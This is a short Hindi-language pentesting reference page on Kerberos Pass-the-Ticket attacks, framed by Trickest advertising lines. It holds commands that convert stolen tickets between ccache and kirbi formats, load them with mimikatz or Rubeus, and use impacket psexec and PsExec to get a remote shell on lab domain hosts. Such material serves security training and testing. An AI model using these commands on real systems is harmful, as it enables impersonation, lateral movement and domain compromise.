Trickest का उपयोग करें और दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित वर्कफ़्लो आसानी से बनाएं और स्वचालित करें। आज ही पहुंच प्राप्त करें:

पास द टिकट (PTT)

पास द टिकट (PTT) हमले की विधि में, हमलावर उपयोगकर्ता का प्रमाणीकरण टिकट चुरा लेते हैं उनके पासवर्ड या हैश मानों की बजाय। इस चुराए गए टिकट का उपयोग फिर उपयोगकर्ता का अनुकरण करने के लिए किया जाता है, जिससे नेटवर्क में संसाधित पहुंच और सेवाओं तक का अनधिकृत उपयोग प्राप्त होता है।

पढ़ें:

• Windows से टिकट हार्वेस्ट करना

• Linux से टिकट हार्वेस्ट करना

लिनक्स और विंडोज टिकट को प्लेटफ़ॉर्म के बीच बदलना

ticket_converter उपकरण टिकट प्रारूपों को केवल टिकट और आउटपुट फ़ाइल का उपयोग करके परिवर्तित करता है।

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

पास द टिकट हमला

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

संदर्भ

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

Trickest का उपयोग करें और आसानी से विश्व के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित कार्यप्रवाह निर्मित करें। आज ही पहुंचें: